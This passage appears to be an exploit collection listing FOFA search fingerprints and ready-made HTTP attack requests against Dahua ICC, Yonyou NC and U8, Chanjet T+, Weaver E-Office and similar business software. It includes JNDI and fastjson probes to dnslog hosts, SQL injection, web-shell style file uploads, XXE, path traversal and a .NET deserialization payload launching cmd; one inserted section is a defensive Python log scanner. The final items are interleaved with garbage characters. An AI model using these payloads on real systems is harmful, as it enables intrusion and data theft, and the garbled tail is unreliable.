Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC smart IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC smart IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

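Items 21 to 23 (and the registerServlet probe in item 25 below) are out-of-band checks: the target is made to resolve a DNS name or fetch an LDAP URL, so the only trace on the victim side is the request body. The block below is an added example, not the original post's code: a small log scanner that flags the log4j `${jndi:` lookup, the fastjson `@type` gadgets and a bare JNDI URL in a form field over constructed request-log lines. It also resolves the common lookup-nesting tricks (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) before matching; anything it does not handle is a miss, not a clean result, so treat it as a triage aid rather than a WAF.

```python
import re
from typing import List, Tuple

# Lookup tricks that hide the literal "jndi" from naive string matching.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]+?)\s*\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")


def defang_lookups(s: str) -> str:
    """Resolve ${lower:j}, ${upper:N}, ${env:NOPE:-j} and ${::-j} to their literal result,
    innermost first, until nothing changes; then lower-case for case-insensitive matching.
    Only the common tricks are handled, so a miss is 'not seen', never 'safe'."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s.lower()


RULES = [
    ("log4j-jndi-lookup", re.compile(r"\$\{\s*jndi\s*:", re.I)),
    ("fastjson-url-gadget", re.compile(r'"@type"\s*:\s*"java\.net\.url"', re.I)),
    ("fastjson-autotype", re.compile(r'"@type"\s*:\s*"com\.alibaba\.fastjson\.', re.I)),
    ("jndi-url-in-param", re.compile(r"[?&=](?:ldap|ldaps|rmi|dns)://", re.I)),
]


def scan_line(line: str) -> List[str]:
    """Names of every rule that fires on one request-log line, in RULES order."""
    text = defang_lookups(line)
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(1-based line number, hits) for the lines that matched anything."""
    out = []
    for i, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            out.append((i, hits))
    return out


# Constructed log lines modelled on items 21-23 and 25 (not real traffic).
SAMPLE_LOG = [
    'POST /evo-apigw/evo-brm/1.2.0/user/is-exist {"loginName":"${jndi:ldap://dnslog}"}',
    'POST /evo-apigw/evo-brm/1.2.0/user/is-exist {"loginName":"${${lower:j}ndi:${::-l}dap://dnslog}"}',
    'POST /evo-runs/v1.0/auths/sysusers/random {"a":{"@type":"com.alibaba.fastjson.JSONObject",'
    '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}',
    'POST /portal/registerServlet type=1&dsname=ldap://dnslog',
    'GET /evo-apigw/evo-brm/1.2.0/user/is-exist?loginName=alice',
]

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(lineno, hits)
```

Because these probes only need a DNS lookup to succeed, the detection that matters most in practice is on the egress side: an application server that should never talk LDAP or RMI outbound, and whose resolver suddenly asks for a dnslog-style name, has already told you the answer.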
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following packet to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

/ A8 |" P& n) l# ]' t" E3 [: N56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- O( O. o# ]# t4 o3 b2 D5 m3 {
FOFA: app="畅捷通-TPlus") _7 ~, x5 W$ m4 B/ x* k4 z8 v
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
% b- Z( g. T) l) Q) sHost: x.x.x.x2 v+ t# P/ s. t$ y$ }4 s% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.369 w: @) o3 k7 z8 _- r" a
Content-Type: application/json
, I2 J2 {5 ^# g) K5 b& K8 l! D2 C8 m
{
; t9 R5 h9 y' c! k6 g  "storeID":{( i8 @' i% }" ?% X+ U1 Q/ @
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 r( z. m( f, i0 T1 @, @' N( D" f   "MethodName":"Start",/ Q( B1 j2 D& h) m, C7 S$ J7 ~( c
    "ObjectInstance":{% F2 E5 e; |, t: X* ^. u
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& U! C* y, r* h" R) j, o6 }5 e
        "StartInfo": {9 u7 V! P& x, v" ~- i
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! u0 u6 e7 @4 d
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
1 A8 Y  @2 G, R4 O. {! {9 E       }2 J( E7 M/ l9 V2 v7 G3 C5 ?7 u; E8 u
    }/ \( _; P! @5 Q8 H, P
  }
8 c2 N1 P  C& i2 p- p$ a}4 _0 m% V2 R% t% S4 M

  ?) L4 ]9 x7 `! \6 y
, e& Y. n( {6 @57. 畅捷通T+ keyEdit.aspx SQL注入
& a# M5 Y0 V% j6 l& y( S3 n8 gFOFA:app="畅捷通-TPlus"
) q3 V: ?) E1 YGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
0 @2 ?4 u8 p4 z* BHost: host( J1 ]8 X0 g4 ^$ ]$ \
